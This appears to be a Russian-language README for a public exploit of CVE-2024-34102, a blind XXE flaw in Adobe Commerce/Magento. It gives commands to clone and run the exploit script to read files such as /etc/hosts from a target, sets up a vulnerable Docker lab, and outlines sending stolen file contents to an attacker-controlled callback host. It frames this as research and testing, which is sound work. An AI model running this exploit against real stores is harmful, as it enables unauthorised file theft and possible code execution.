
Adobe Commerce XXE эксплойт
★ Благодарим @th3gokul, Sanjaith3hacker, Chocapikk за исходную кодовую базу. ★
CVE-2024-34102 : уязвимость XXE в Adobe Commerce описание: Adobe Commerce версии 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 и более ранние затронуты уязвимостью, связанной с неправильным ограничением ссылок на внешние XML-сущности (XXE), что может привести к выполнению произвольного кода. Атакующий может воспользоваться этой уязвимостью, отправив специально сформированный XML-документ, который ссылается на внешние сущности. Эксплуатация этой проблемы не требует взаимодействия с пользователем.
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

Благодаря Docker-конфигурации Magento от markshust создать уязвимую среду разработки несложно. https://github.com/markshust/docker-magento
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

Вы можете отлаживать Magento с помощью PHPSTORM.
bin/xdebug enable

..И затем вы можете отлаживать Magento.
Создать callback URL (mocky api) -> Слепая XXE-атака (CVE-2024-34102) -> Отправить содержимое файла в экземпляр атакующего (SSRFUtility) -> Прочитать экземпляр атакующего (SSRFUtility)
Этот репозиторий не предназначен для эксплуатации XXE в CVE-2024-34102. Цель проекта — помочь людям изучить эту уязвимость и, возможно, протестировать свои собственные приложения.
Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями. https://www.skshieldus.com/eng/business/insight.do